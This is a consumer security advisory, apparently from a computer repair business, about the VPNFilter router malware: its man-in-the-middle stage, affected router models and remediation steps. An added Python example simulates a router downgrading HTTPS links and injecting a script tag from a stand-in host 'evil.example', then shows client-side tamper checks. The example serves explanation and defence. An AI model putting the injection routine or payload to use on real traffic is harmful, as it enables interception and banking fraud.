
Russia Router Malware Update

Is your router affected?

Cisco’s Talos has released additional details regarding VPNFilter, including a longer list of affected routers and possible attacks. In a follow-up post, Talos described “a new stage 3 module that injects malicious content into web traffic as it passes through a network device.” This is a “man-in-the-middle” attack: because the infected router sits between your computer and the internet, the attackers can read your unencrypted web traffic and alter it before it reaches your browser, with nothing on your end to show it happened. A hacker can therefore control what you see on your screen while doing something entirely different in the background. The injection works on unencrypted (plain HTTP) traffic, so a bank or shopping page that loads without the browser’s padlock icon from behind an affected router is a warning sign. As Craig Williams, a senior technology leader and global outreach manager at Talos, explained, “They can modify your bank account balance so that it looks normal while at the same time they’re siphoning off money and potentially PGP keys and things like that. They can manipulate everything going in and out of the device.” That’s a much greater threat than initially feared.
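To make the man-in-the-middle threat concrete, here is an added illustration (not VPNFilter’s code and not from the original article) of what a malicious router can do to a plaintext HTTP response passing through it, alongside the checks a client can apply to notice it. The page body, the bank hostname, the payload and the “evil.example” script host are all constructed for the example; the tampering shown (downgrading https:// links so later requests also travel in the clear, injecting a script tag, and patching Content-Length so the result looks consistent) is the general class of attack the stage 3 module belongs to, not a claim about its exact implementation.

```python
"""Toy model of in-transit HTTP tampering by a compromised router, plus
client-side indicators. Added example; all hosts and data are constructed."""
import hashlib
import re

# Constructed sample page as the origin server sent it (not a real site).
SAMPLE_BODY = (
    b"<html><head><title>Portal</title></head>"
    b"<body><p>Welcome.</p>"
    b'<a href="https://bank.example/login">Online banking</a>'
    b"</body></html>"
)

# Hypothetical injected payload; a real one would load attacker JavaScript.
SAMPLE_PAYLOAD = b'<script src="http://evil.example/x.js"></script>'


def build_response(body, content_type=b"text/html; charset=utf-8"):
    """Return a minimal HTTP/1.1 200 response with a correct Content-Length."""
    return (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: " + content_type + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"\r\n" + body
    )


def split_message(raw):
    """Split a raw HTTP message into (status line, header dict, body).
    Header names are lower-cased; HTTP treats them case-insensitively."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def middlebox_rewrite(raw, payload, fix_content_length=True):
    """Simulate a malicious router modifying a plaintext response in transit:
    downgrade HTTPS links so the next request is also readable, inject a
    script tag before </body>, and (for a careful attacker) patch
    Content-Length so the altered body still parses cleanly."""
    status, headers, body = split_message(raw)
    body = body.replace(b"https://", b"http://")
    body = body.replace(b"</body>", payload + b"</body>", 1)
    if fix_content_length:
        headers[b"content-length"] = str(len(body)).encode()
    # A redirect's Location header gets the same downgrade treatment.
    if b"location" in headers:
        headers[b"location"] = headers[b"location"].replace(b"https://", b"http://")
    head = b"\r\n".join([status] + [k + b": " + v for k, v in headers.items()])
    return head + b"\r\n\r\n" + body


def body_digest(raw):
    """SHA-256 of the body. Obtain the reference value over a path you trust,
    e.g. the same URL fetched over HTTPS from a different network."""
    return hashlib.sha256(split_message(raw)[2]).hexdigest()


# Matches plain-http links and captures the host part.
LINK_RE = re.compile(rb'href="http://([^/"]+)')


def tamper_indicators(raw, https_only_hosts, known_good_digest=None):
    """Return reasons to suspect the response was modified on the way in.
    https_only_hosts: hosts you know should never be linked over plain http
    (your bank, your mail provider); known_good_digest: trusted body hash."""
    _status, headers, body = split_message(raw)
    found = []
    declared = headers.get(b"content-length")
    if declared is not None and int(declared) != len(body):
        found.append("content-length-mismatch")
    for host in LINK_RE.findall(body):
        if host.decode() in https_only_hosts:
            found.append("downgraded-link:" + host.decode())
    if known_good_digest is not None and hashlib.sha256(body).hexdigest() != known_good_digest:
        found.append("body-digest-mismatch")
    return found


if __name__ == "__main__":
    clean = build_response(SAMPLE_BODY)
    reference = body_digest(clean)
    evil = middlebox_rewrite(clean, SAMPLE_PAYLOAD)
    print("clean:", tamper_indicators(clean, {"bank.example"}, reference))
    print("tampered:", tamper_indicators(evil, {"bank.example"}, reference))
```

The digest check only works if the reference hash comes from a channel the router cannot tamper with, which is the underlying point: the middlebox can only rewrite what it can read, so sites served strictly over HTTPS (and browsers that refuse the downgrade via HSTS) are out of its reach, while a home user’s real defence is still removing the malware from the router.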

Symantec released the following list of routers and NAS devices known to be susceptible to VPNFilter. Some are popular affordable models, and one (the Netgear WNR1000) is provided to Comcast customers in some circumstances.

Affected Routers

Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS on Cloud Core Routers (the CCR1016, CCR1036, and CCR1072 models)
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN

In the first week of June, Cisco issued a warning that the threat goes beyond those models and includes a wider swath of routers manufactured by ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. So once again: the FBI and Cisco suggest that everyone reboot their router, even if yours is not on this list. Rebooting your router wipes out what Cisco calls the “Stage 2” and “Stage 3” elements of VPNFilter, the parts that actually do the damage, because they live only in memory. The FBI also seized the ToKnowAll.com domain that Stage 1 uses to fetch those components, so after a reboot an infected router’s attempt to re-download them helps investigators identify it instead of reinfecting it.

What makes VPNFilter so sophisticated is its “Stage 1” element, which survives a reboot and then contacts the attackers’ infrastructure to reinstall the other stages of the malware.
The only way to fully remove the malware is a factory reset of your router followed by an update to the latest firmware the manufacturer offers, which closes the known vulnerabilities VPNFilter used to get in. It’s a complicated procedure that will require you to reconfigure your network settings, but we recommend doing it if your router is on the list of devices known to be vulnerable to VPNFilter. Do the firmware update and password change right after the reset: a router back on its factory firmware is still vulnerable until it is updated. The FBI and some hardware makers also recommend disabling remote management features on your router; these are off by default in most cases, but check rather than assume. You’ll also want to change your router’s default login credentials to a strong, unique password that you don’t use for any other website or service.

The exact procedure for resetting a router varies by make and model; for help, please contact the techs at Frankenstein Computers and Networking.

Adapted from an article on



Frankenstein Computers has been taking care of our happy clients since 1999. We specialize in IT Support, IT Service, MAC repair, PC Repair, Virus Removal, and much more. Give us a call for remote support or drop in to drop off.